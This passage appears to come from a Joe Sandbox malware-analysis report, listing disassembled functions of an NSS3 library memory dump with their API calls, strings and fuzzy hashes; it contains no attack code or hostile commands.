NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C605153
free.MOZGLUE(?), ref: 6C60516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C60517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C605195

Strings

config=, xrefs: 6C60509B
parameters=, xrefs: 6C60506B
nss=, xrefs: 6C605083
library=, xrefs: 6C605043
name=, xrefs: 6C605057

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=
API String ID: 391827415-203331871
Opcode ID: 9c9123a9aad23ef357ae27baaf6f1477b7a01772dae5cf20380a1140f8b3d3ef
Instruction ID: 92c19cdb05fbd24b4fc9144e278acba8abec68665e11cddc978ad0b21b74b61f
Opcode Fuzzy Hash: 9c9123a9aad23ef357ae27baaf6f1477b7a01772dae5cf20380a1140f8b3d3ef
Instruction Fuzzy Hash: B351A6B5B012056BEB14DF25DD41AAE37A89F16348F140060EC16F7B42E735E919CBBE

Function 6C604C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C5F4F51,00000000), ref: 6C604C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C5F4F51,00000000), ref: 6C604C5B
PR_smprintf.NSS3(6C6DAAF9,?,0000002F,?,?,?,00000000,00000000,?,6C5F4F51,00000000), ref: 6C604C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C5F4F51,00000000), ref: 6C604CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C604CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C604CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C604D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C5F4F51,00000000), ref: 6C604D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C5F4F51,00000000), ref: 6C604D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C604D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C604DA2
free.MOZGLUE(?), ref: 6C604DB9
free.MOZGLUE(00000000), ref: 6C604DCF

Strings

rootFlags, xrefs: 6C604D47
every, xrefs: 6C604CA1
timeout, xrefs: 6C604C91
0x%08lx=[%s %s], xrefs: 6C604D80
%s,%s, xrefs: 6C604C4B
rust, xrefs: 6C604D22
ootT, xrefs: 6C604D1A
slotFlags, xrefs: 6C604D34
any, xrefs: 6C604C96
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C604D9D

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: 54e15545154115c71b465d120fee82b12c0e0ea7622ed202843044031a1fa3b6
Instruction ID: b9506f5ee95d7ef3ceb5e457bf1d2160f036c7c4286c3b94f4ddb360e2d20f73
Opcode Fuzzy Hash: 54e15545154115c71b465d120fee82b12c0e0ea7622ed202843044031a1fa3b6
Instruction Fuzzy Hash: 8D417FB1A0014167DB315F159D84ABB36B5AFA330CF094124E8166BB41E771E924C7DF

Function 6C5E6CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5E6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C5E6943
Part of subcall function 6C5E6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C5E6957
Part of subcall function 6C5E6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C5E6972
Part of subcall function 6C5E6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C5E6983
Part of subcall function 6C5E6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C5E69AA
Part of subcall function 6C5E6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C5E69BE
Part of subcall function 6C5E6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C5E69D2
Part of subcall function 6C5E6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C5E69DF
Part of subcall function 6C5E6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C5E6A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C5E6D8C
free.MOZGLUE(00000000), ref: 6C5E6DC5
free.MOZGLUE(?), ref: 6C5E6DD6
free.MOZGLUE(?), ref: 6C5E6DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C5E6E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C5E6E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C5E6E72
free.MOZGLUE(?), ref: 6C5E6EA7
free.MOZGLUE(?), ref: 6C5E6EC4
free.MOZGLUE(?), ref: 6C5E6ED5
free.MOZGLUE(00000000), ref: 6C5E6EE3
free.MOZGLUE(?), ref: 6C5E6EF4
free.MOZGLUE(?), ref: 6C5E6F08
free.MOZGLUE(00000000), ref: 6C5E6F35
free.MOZGLUE(?), ref: 6C5E6F44
free.MOZGLUE(?), ref: 6C5E6F5B
free.MOZGLUE(00000000), ref: 6C5E6F65

Part of subcall function 6C5E6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C5E781D,00000000,6C5DBE2C,?,6C5E6B1D,?,?,?,?,00000000,00000000,6C5E781D), ref: 6C5E6C40
Part of subcall function 6C5E6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C5E781D,?,6C5DBE2C,?), ref: 6C5E6C58
Part of subcall function 6C5E6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C5E781D), ref: 6C5E6C6F
Part of subcall function 6C5E6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C5E6C84
Part of subcall function 6C5E6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C5E6C96
Part of subcall function 6C5E6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C5E6CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C5E6F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C5E6FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C5E6FF4

Strings

+`_l, xrefs: 6C5E6D0D

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID: +`_l
API String ID: 1304971872-1736921323
Opcode ID: b2b5fde95845f03d01bed8ff07492622d51fdd48a8cff9f1d6f85f694d802d71
Instruction ID: a7fc7e4524dbc173b9f77e1a30170923edbd1cab0173573462a9442681c4a697
Opcode Fuzzy Hash: b2b5fde95845f03d01bed8ff07492622d51fdd48a8cff9f1d6f85f694d802d71
Instruction Fuzzy Hash: E5B161B1E0131D9FDF10DBA5DC84B9E7BB9AF09388F140124EA15E7A45EB31E914CBA1

Function 6C591FE0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 254COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000084,00000001,00000000), ref: 6C592007
calloc.MOZGLUE(00000001,00000084), ref: 6C592077
calloc.MOZGLUE(00000001,0000002C), ref: 6C5920DF
TlsSetValue.KERNEL32(00000000), ref: 6C592188
PR_NewCondVar.NSS3 ref: 6C5921B7
calloc.MOZGLUE(00000001,00000084), ref: 6C59221C
InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C5922C2
GetLastError.KERNEL32 ref: 6C5922CD
free.MOZGLUE(00000000), ref: 6C5922DD

Part of subcall function 6C590F00: PR_GetPageSize.NSS3(6C590936,FFFFE8AE,?,6C5216B7,00000000,?,6C590936,00000000,?,6C52204A), ref: 6C590F1B
Part of subcall function 6C590F00: PR_NewLogModule.NSS3(clock,6C590936,FFFFE8AE,?,6C5216B7,00000000,?,6C590936,00000000,?,6C52204A), ref: 6C590F25

Strings

X pl, xrefs: 6C59218E
T pl, xrefs: 6C592361

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: calloc$CondCountCriticalErrorInitializeLastModulePageSectionSizeSpinValuefree
String ID: T pl$X pl
API String ID: 3559583721-3390162276
Opcode ID: ae66d31cd9ace62caf0736434a8ffa1a4e213784c5fe874c04b64285fc0368ad
Instruction ID: 95e2c4d347c5bc0c0ed10d2572120d7739bb247818b5444a04a5764f5250d100
Opcode Fuzzy Hash: ae66d31cd9ace62caf0736434a8ffa1a4e213784c5fe874c04b64285fc0368ad
Instruction Fuzzy Hash: 47917CB1B017419FDB20EF39DC49B5B7AF4BB06708F00492EE45AD6A40DB70A508CF96

Function 6C5ADDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C5ADDDE

Part of subcall function 6C600FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
Part of subcall function 6C600FF0: PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016
Part of subcall function 6C600FF0: PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6C5ADDF5

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C5ADE34
PR_Now.NSS3 ref: 6C5ADE93
CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6C5ADE9D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5ADEB4
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C5ADEC3
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C5ADED8
PR_smprintf.NSS3(%s%s,?,?), ref: 6C5ADEF0
PR_smprintf.NSS3(6C6DAAF9,(NULL) (Validity Unknown)), ref: 6C5ADF04
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5ADF13
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C5ADF22
memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6C5ADF33
free.MOZGLUE(00000000), ref: 6C5ADF3C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5ADF4B
free.MOZGLUE(00000000), ref: 6C5ADF74
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5ADF8E

Strings

%s%s, xrefs: 6C5ADEEB
(NULL) (Validity Unknown), xrefs: 6C5ADEFA
{???}, xrefs: 6C5ADE8B

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
String ID: %s%s$(NULL) (Validity Unknown)${???}
API String ID: 1882561532-3437882492
Opcode ID: 144412b0d8c0adc40e8d2f50666c4cd68c4c1a618b296248080d0d6ea0bd4147
Instruction ID: bde243aaf0c9a540b2769d225217081e7aab5eba04d012c14561ff637438d16e
Opcode Fuzzy Hash: 144412b0d8c0adc40e8d2f50666c4cd68c4c1a618b296248080d0d6ea0bd4147
Instruction Fuzzy Hash: F751C4B1E001019BDB10EFA69C41AAF7BB5AF8A358F144438EC09E7B01E731E915CBE5

Function 6C5DAF20 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 126COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SignMessage), ref: 6C5DAF46
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5DAF74
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5DAF83

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5DAF99
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C5DAFBE
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C5DAFD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C5DAFF4
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C5DB00F
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C5DB028
PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6C5DB041

Strings

pulSignatureLen = 0x%p, xrefs: 6C5DB03C
(CK_INVALID_HANDLE), xrefs: 6C5DAF7C
hSession = 0x%x, xrefs: 6C5DAF5E, 6C5DAF6E
C_SignMessage, xrefs: 6C5DAF41
pSignature = 0x%p, xrefs: 6C5DB023
nkl, xrefs: 6C5DB059, 6C5DB093
ulParameterLen = 0x%p, xrefs: 6C5DAFD4
ulDataLen = %d, xrefs: 6C5DB00A
pParameter = 0x%p, xrefs: 6C5DAFB9
pData = 0x%p, xrefs: 6C5DAFEF

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage$nkl
API String ID: 1003633598-2905834296
Opcode ID: 1806580145a9c27e25ad93b9b228d655403875f83c08a6fe8fc57252bd1f4a9c
Instruction ID: a3c232a9535c24c5257dd0fe8c32755af5e0e5ecec0e3b25e4bf49a8e1b3163a
Opcode Fuzzy Hash: 1806580145a9c27e25ad93b9b228d655403875f83c08a6fe8fc57252bd1f4a9c
Instruction Fuzzy Hash: CF4184B6701245EFDB00AF54DD48A8A7BB2EB8231DF494078E50867612DF34D958CBAF

Function 6C5E2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C5E2DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C5E2E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C5E2E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C5E2E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C5B4F1C,?,-00000001,00000000,?), ref: 6C5E2E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C5B4F1C,?,-00000001,00000000), ref: 6C5E2E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C5E2EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C5E2EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C5E2EF8
PR_Unlock.NSS3(?), ref: 6C5E2F62
TlsGetValue.KERNEL32 ref: 6C5E2F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C5E2F9E
PR_Unlock.NSS3(?), ref: 6C5E2FCA
TlsGetValue.KERNEL32 ref: 6C5E301A
EnterCriticalSection.KERNEL32(?), ref: 6C5E302E
PR_Unlock.NSS3(?), ref: 6C5E3066
PR_SetError.NSS3(00000000,00000000), ref: 6C5E3085
PR_Unlock.NSS3(?), ref: 6C5E30EC
TlsGetValue.KERNEL32 ref: 6C5E310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C5E3124
PR_Unlock.NSS3(?), ref: 6C5E314C

Part of subcall function 6C5C9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C5F379E,?,6C5C9568,00000000,?,6C5F379E,?,00000001,?), ref: 6C5C918D
Part of subcall function 6C5C9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C5F379E,?,6C5C9568,00000000,?,6C5F379E,?,00000001,?), ref: 6C5C91A0

Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907AD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907CD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907D6
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C52204A), ref: 6C5907E4
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,6C52204A), ref: 6C590864
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C590880
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,6C52204A), ref: 6C5908CB
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908D7
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908FB

PR_SetError.NSS3(00000000,00000000), ref: 6C5E316D

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 8dbfc6f1b2e22f909f4b2d2b1abccf6e27fe76dd04fa27397a1c80f93837b9a4
Instruction ID: 4466e98a4ec7e688e7f70a83968ec96aa1dce9bca807fca7f377aef2a3b52599
Opcode Fuzzy Hash: 8dbfc6f1b2e22f909f4b2d2b1abccf6e27fe76dd04fa27397a1c80f93837b9a4
Instruction Fuzzy Hash: 3BF1BEB5E00219EFDF00DF68DC84B9ABBB5BF09318F044569EC15A7721EB31A995CB81

Function 6C5D6D60 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6C5D6D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D6DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D6DC3

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D6DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C5D6DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C5D6E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C5D6E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C5D6E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C5D6EB9

Strings

(CK_INVALID_HANDLE), xrefs: 6C5D6DBC
C_Digest, xrefs: 6C5D6D81
hSession = 0x%x, xrefs: 6C5D6D9E, 6C5D6DAE
*pulDigestLen = 0x%x, xrefs: 6C5D6EB4
pDigest = 0x%p, xrefs: 6C5D6E27
nkl, xrefs: 6C5D6E61, 6C5D6E95
ulDataLen = %d, xrefs: 6C5D6E0E
pData = 0x%p, xrefs: 6C5D6DF5
pulDigestLen = 0x%p, xrefs: 6C5D6E42

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest$nkl
API String ID: 1003633598-2963096691
Opcode ID: 64d58a1f8b6b8b51a02f7f0f39f86f4ac41686dac2ca9455ef8d93f8e4e911d9
Instruction ID: 4015f95e781c705531c0a5ff17bd805dd65cdfdd7c7893b855927275d61818a8
Opcode Fuzzy Hash: 64d58a1f8b6b8b51a02f7f0f39f86f4ac41686dac2ca9455ef8d93f8e4e911d9
Instruction Fuzzy Hash: AE41B7B5701245EFDB00EF58DD49B8B3BB1EB82319F454428E808A7612DF30E859CF9A

Function 6C5D9C40 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 118COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_LoginUser), ref: 6C5D9C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D9C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D9CA3

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D9CB9
PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6C5D9CDA
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C5D9CF5
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C5D9D10
PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6C5D9D29
PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6C5D9D42

Strings

pPin = 0x%p, xrefs: 6C5D9CF0
C_LoginUser, xrefs: 6C5D9C61
ulPinLen = %d, xrefs: 6C5D9D0B
(CK_INVALID_HANDLE), xrefs: 6C5D9C9C
hSession = 0x%x, xrefs: 6C5D9C7E, 6C5D9C8E
ulUsernameLen = %d, xrefs: 6C5D9D3D
userType = 0x%x, xrefs: 6C5D9CD5
nkl, xrefs: 6C5D9D5A, 6C5D9D91
pUsername = 0x%p, xrefs: 6C5D9D24

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
